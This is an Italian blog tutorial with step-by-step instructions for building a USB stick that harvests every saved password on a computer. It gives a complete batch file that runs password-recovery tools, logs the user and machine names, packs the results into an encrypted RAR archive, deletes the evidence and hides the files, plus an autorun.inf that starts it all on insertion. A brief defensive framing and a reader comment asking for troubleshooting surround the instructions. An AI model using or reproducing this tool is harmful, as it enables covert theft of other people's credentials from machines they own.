Creiamo una pen usb magica che ci permette rubare tutte le password di un computer!

E’ ormai noto il crimine del furto delle password tramite il phishing, ma oltre a questo metodo ne esistono molti altri che sono anche molto pericolosi, uno tra questi è la chiave ruba-tutto che salva tutte le password in una cartella della stessa pen usb in pochi istanti; è possibile crearla grazie all’aiuto di semplici programmini e qualche stringa di codice.

Per organizzare una difesa è quindi necessario capire come attaccherà il nostro nemico, uno dei tanti metodi lo illustriamo di seguito:

Difficoltà: Media

 Tempo: 10 minuti

Occorrente: Una pen USB

Utilizzando il motore di ricerca di questo sito, posto in alto a destra, individuate il programma che vi interessa con una breve descrizione di quello che fa; es. ricercate “rubare la password di MSN” , ” rubare password”, “rubare la password di x” dove x è un qualunque programma.

Dopo aver scaricato i programmi dai link forniti estraeteli nella cartella pen usb. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.ù

Successivamente, scaricate ed installate l’ultima versione di Winrar. Poi andate su Start/Risorse del computer/C:/Programmi/WinRAR, per copiare ed incollare il programma Rar.exe nella cartella del desktop pen usb.

A questo punto inizia il lavoro vero e proprio: Aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella pen usb:

—inizio codice—

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

—fine codice—

Successivamente scrivete, invece, le righe:

—inizio codice—

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

—fine codice—

Quando questo programma viene avviato, le password verranno recuperate dal computer e salvate in diversi file .HTML in termini di pochi secondi, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD. Fate attenzione alle lettere maiuscole e minuscole.

Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR.

In questo caso (programmi MessenPass e Mail PassView)possiamo scrivere queste righe:

—inizio codice—

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

—fine codice—

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella pen usb.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

—inizio codice—

[autorun]
open=lancia.bat
action=Preleva password

—fine codice—

A questo il lavoro è finito. Dovete semplicemente copiare tutti i file nella cartella principale della vostra pen USB per concludere l’operazione.

Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la pen usb. Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la pen usb ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

Con questo articolo avete quindi capito uno dei tanti modi di come è possibile rubare una password, allora organizziamo una difesa a questo metodo, eliminate tutte le password salvate nel computer!

Un pensiero su “Creiamo una pen usb magica che ci permette rubare tutte le password di un computer!

  1. quando inserisco la pen-drive non esce come scelta “preleva password”….come risolvo?

I commenti sono chiusi.